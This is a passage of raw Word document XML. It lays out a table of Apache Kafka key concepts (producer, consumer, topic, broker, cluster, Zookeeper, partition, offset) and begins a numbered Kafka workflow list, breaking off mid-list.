    <w:p w14:paraId="4CE02913" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007E40A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3ECCD351">
          <v:rect id="_x0000_i3058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94A680" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">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Key Concep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9"/>
        <w:gridCol w:w="8444"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="78F45A41" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37C46C38" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05787385" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="084E183B" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51375E82" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Producer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54317479" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sends (publishes) messages to Kafka topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="0093961C" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="370453D8" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C115917" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reads messages from Kafka topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="7B161F07" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38F25FFA" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Topic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4558CF51" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A category/feed name to which messages are sent and from which they're received</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="14CD3E4C" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AB1501F" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F5B836A" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A Kafka server that stores data and serves clients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="66E45B5C" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20DB9359" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B0777A" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A group of brokers working together</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="270E9089" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6191C2AB" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Zookeeper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE609B1" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Used for managing Kafka metadata (Note: Kafka 3.x+ is moving towards removing Zookeeper)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="4C2C6DB1" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74CBAB50" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44780A35" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Topics are split into partitions for scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w14:paraId="2D709EB1" w14:textId="77777777" w:rsidTr="007E40A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F79025B" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="405C3BD8" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unique ID for each message within a partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5484C23E" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007E40A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="52D3ADC8">
          <v:rect id="_x0000_i3059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CAB7B" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">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Kafka Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEB30D3" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends messages to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBCEFC3" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Topic is split into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for parallelism).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46CEE6" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> store partitioned messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C3D33" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> read messages using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4499BA" w14:textId="77777777" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
